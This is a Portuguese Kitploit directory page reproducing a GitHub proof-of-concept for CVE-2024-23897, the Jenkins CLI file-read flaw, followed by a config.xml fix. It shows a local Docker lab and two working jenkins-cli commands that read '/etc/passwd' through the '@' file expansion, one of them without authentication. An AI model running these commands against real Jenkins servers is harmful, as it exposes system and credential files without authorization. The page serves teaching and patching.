Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — neste git você pode encontrar todas as informações sobre o CVE-2024-23897 | Kitploit
Ferramentas/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

neste git você pode encontrar todas as informações sobre o CVE-2024-23897

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
42há 2 anosAinda não revisado

PoC-jenkins-rce_CVE-2024-23897.

Neste git você pode encontrar todas as informações sobre o CVE-2024-23897.

logo-jenkins

Introdução

O problema, atribuído ao identificador CVE-2024-23897, foi descrito como uma vulnerabilidade de leitura arbitrária de arquivos através da interface de linha de comando embutida. Este analisador de comandos possui um recurso que substitui um caractere '@' seguido por um caminho de arquivo em um argumento pelo conteúdo do arquivo (expandAtFiles). Este recurso está habilitado por padrão e no Jenkins 2.441 e anteriores, LTS 2.426.2 e anteriores não o desabilita.

PoC

Para este PoC, instalei o Jenkins 2.426.2 com Docker para testar a exploração da vulnerabilidade

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

Após criar um usuário e uma senha, baixei o cliente Jenkins CLI (jenkins-cli.jar) na minha máquina atacante.

screen1

Em seguida, escrevi o comando para o exploit. Neste comando, precisamos ter as credenciais do usuário Jenkins.

root@kitploit:~
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

Outro comando permite exibir as primeiras linhas de um arquivo sem autenticação.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

Corrigir a vulnerabilidade

Para neutralizar esta vulnerabilidade, você precisa navegar até o arquivo de configuração do Jenkins chamado config.xml (no meu caso, ele está localizado no meu contêiner Docker, então mudo para o modo shell no meu contêiner)

screen4
e adicionar a linha:
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

e reiniciar o jenkins :

root@kitploit:~
service jenkins restart
Baixar ferramenta